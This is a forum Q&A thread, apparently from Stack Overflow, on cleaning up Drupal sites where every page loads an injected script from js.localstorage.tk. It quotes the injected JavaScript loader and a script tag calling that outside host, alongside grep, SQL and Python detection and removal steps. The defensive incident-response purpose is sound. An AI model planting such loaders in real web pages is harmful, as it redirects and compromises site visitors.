
For the last few days, my sites have come under a malicious attack. When I open a site http://site1.com it first gets redirected to another page (possibly an ad page).

In the Chrome browser, when I try to diagnose the problem through the console (F12), I find it shows me a strange error: "Failed to load resource: net::ERR_NAME_NOT_RESOLVED", and the URL is https://js.localstorage.tk/s.js?crt=new. On further investigation I found that it injects the following script on every page load of every website on that particular server (not one site but 3-4 sites have been infected with the same attack on the same server).

var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?crt=new"; document.head.appendChild(z);

I have also tried to find this code snippet in the hosted file systems of the infected websites, using various "grep" commands as below, but I couldn't find anything.

 grep -rwn /var/www/ -e 'js.localstorage.tk'
 grep -rwn /var/www/ -e 'var z'
 grep -rwn /var/www/ -e 'z.type'
 grep -rwn /var/www/ -e 'z.src'
 grep -rwn /var/www/ -e 'crt=new'

But no clue of the malicious injected script. Same result in the DB investigation.

When I access my site through the LAN without internet, I get the same error with a weird URL:

GET https://js.localstorage.tk/s.js?crt=new net::ERR_NAME_NOT_RESOLVED debugger:///VM359:1

And the worst thing is that now Google has listed my sites in its "Dangerous" list and it shows the warning "Deceptive site ahead" with a dark red background.

Any help...!!!

Sohel Pathan

2 Answers


Find the code with this command:

grep -rwn /var/www/ -e 'eval(String.fromCharCode'

sadadd
  • Thanks @sadadd. You are right. This command gave me the entire list of affected files. Can anyone explain to me how those files have been affected? Should I further investigate for any batch file or some virus file? If yes, then how? – Sohel Pathan May 03 '18 at 11:53
  • In my case, all *.tpl.php files in the /var/www/ directory were affected. – Sohel Pathan May 03 '18 at 11:54
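To go one step beyond the grep above, here is an added example (not from the answer or the asker) that walks a document root, decodes every eval(String.fromCharCode(...)) loader it finds so you can confirm it resolves to the js.localstorage.tk script from the question, and sorts the hits by modification time, which makes the "all files touched at the same timestamp" pattern visible. The file suffixes and the default /var/www root are assumptions.

```python
import os
import re
import sys
import time

# Obfuscated loader shape the answer's grep matches: eval(String.fromCharCode(118,97,...))
FROMCHARCODE_RE = re.compile(r"eval\(String\.fromCharCode\(([\d,\s]+)\)\)")
# Host named in the question; a decoded payload is flagged when it references it
INDICATOR = "js.localstorage.tk"


def decode_fromcharcode(text):
    """Return the plain-text JavaScript hidden in each eval(String.fromCharCode(...)) call."""
    decoded = []
    for match in FROMCHARCODE_RE.finditer(text):
        codes = [int(c) for c in match.group(1).replace(" ", "").split(",") if c]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk `root` and list files carrying the obfuscated loader, oldest mtime first.

    Each hit records the path, its modification time, whether the decoded payload
    references INDICATOR, and the first decoded payload for manual review.
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the whole scan
            payloads = decode_fromcharcode(text)
            if payloads:
                hits.append({
                    "path": path,
                    "mtime": int(os.path.getmtime(path)),
                    "indicator": any(INDICATOR in p for p in payloads),
                    "payload": payloads[0],
                })
    return sorted(hits, key=lambda h: h["mtime"])


if __name__ == "__main__":
    # Assumed default root; pass another directory as the first argument
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/var/www"):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(hit["mtime"]))
        flag = "KNOWN-IOC" if hit["indicator"] else "review"
        print(f"{stamp}  {flag:9}  {hit['path']}\n    {hit['payload'][:100]}")
```

Files decoded to something other than the known loader are marked "review" rather than discarded, since the same obfuscation wrapper can hide a different payload.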

You should check your DB.

I have the same problem and found the script in every row of the field_data_body table in the body_summary column.

Perform a search on all tables with the following query: %js.localstorage.tk%

Here is a removal query:

UPDATE field_data_body SET `body_summary`=REPLACE(`body_summary`,"<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>","");
  • In my case @sadadd's answer helped and worked well. As I mentioned in the question, I couldn't find any such keyword in the DB using LIKE operators. By the way, thanks for sharing your scenario so that it may help future visitors to this thread. – Sohel Pathan May 05 '18 at 10:37
  • Additionally, please share the root cause of the said attack, if you have been able to find it. Which part of the server/files was compromised so that this kind of malicious thing happened? – Sohel Pathan May 05 '18 at 10:42
  • @SohelPathan: I've seen this on servers that did not upgrade in time to the latest Drupal versions over the last several weeks. See https://www.drupal.org/security/ for details. – bhotel May 08 '18 at 10:00
  • @bhotel thanks for your reply, I will check it out for the Drupal version and other security alerts, if any. – Sohel Pathan May 10 '18 at 06:21
  • @bhotel you are right. It shows a notification stating "Security update required!". I will do the update. Apart from that, I also found that all *.tpl.php on that particular server were affected at the same timestamp. How was it attacked? On the fly over the internet? Or does some batch/script file still exist on my server which caused the malicious thing? – Sohel Pathan May 15 '18 at 09:41
  • @SohelPathan There may be no way to tell. There's a Drupal-specific guide for what to do after your site's been compromised here: https://www.drupal.org/docs/develop/security/your-drupal-site-got-hacked-now-what – bhotel May 15 '18 at 12:30